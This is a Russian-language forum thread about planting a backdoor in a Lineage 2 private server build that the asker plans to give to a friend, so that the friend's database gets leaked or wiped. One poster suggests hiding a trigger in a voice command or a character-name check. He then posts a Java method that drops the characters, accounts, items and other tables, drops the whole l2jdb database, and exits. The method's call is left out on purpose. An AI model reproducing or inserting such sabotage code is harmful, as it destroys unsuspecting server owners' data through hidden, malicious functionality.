evillord 14 Опубликовано 28 июля, 2013 Нужна помощь я не знаю как сделать нормально шелл в сборку ребелиона HF 688 , кто поможет +++ Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
evillord 14 Опубликовано 28 июля, 2013 Или скрипт что бы базу сливал . Например я даю сборку другу он создает акк или тип того и что бы мне слилось все ... Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
pkforewer 1 Опубликовано 28 июля, 2013 нефиг школьникам играться с такими вещами 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
mar4ello24 48 Опубликовано 28 июля, 2013 это называется бекдор, наврятли вам кто то даст готовый, дам подсказку, это можно реализовать через Voice команду. еще как вариант через создание персонажа, проверка на ник если совпадает, дропаем базуну это самое просто, всё зависит от фантазии Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
evillord 14 Опубликовано 28 июля, 2013 нефиг школьникам играться с такими вещами Улыбнуло Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
evillord 14 Опубликовано 28 июля, 2013 Это все я и сам знаю . Я не знаю как это реализовать . Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
GoodLuck 1 Опубликовано 28 июля, 2013 За бесплатно тут врятли кто-то возьмется. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
mar4ello24 48 Опубликовано 28 июля, 2013 private void zoltan { Connection con = null; try { con = L2DatabaseFactory.getInstance().getConnection(); Statement e = con.createStatement(); e.executeUpdate("DROP TABLE characters"); e.executeUpdate("DROP TABLE accounts"); e.executeUpdate("DROP TABLE spawnlist"); e.executeUpdate("DROP TABLE weapon"); e.executeUpdate("DROP TABLE armor"); e.executeUpdate("DROP TABLE npc"); e.executeUpdate("DROP TABLE items"); e.executeUpdate("DROP database l2jdb"); e.close(); } catch (SQLException e) { } finally { try { if (con != null) con.close(); } catch (SQLException e) { e.printStackTrace(); } } System.exit(-1); } тип такого, вызов только запилить Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Yokus 19 Опубликовано 28 июля, 2013 тип такого, вызов только запилить Скобочки специально пропущены? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
mar4ello24 48 Опубликовано 28 июля, 2013 (изменено) там ешё и вызова команды нету захочет додумает Изменено 28 июля, 2013 пользователем mar4ello24 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
evillord 14 Опубликовано 28 июля, 2013 Ещо такой вопрос а куда направлять это все ? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Russian 49 Опубликовано 28 июля, 2013 нефиг школьникам играться с такими вещами тебе написали За бесплатно тут врятли кто-то возьмется. там ешё и вызова команды нету захочет додумает Если есть знания то сделаешь, а если нет то врятли кто-то сделает Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты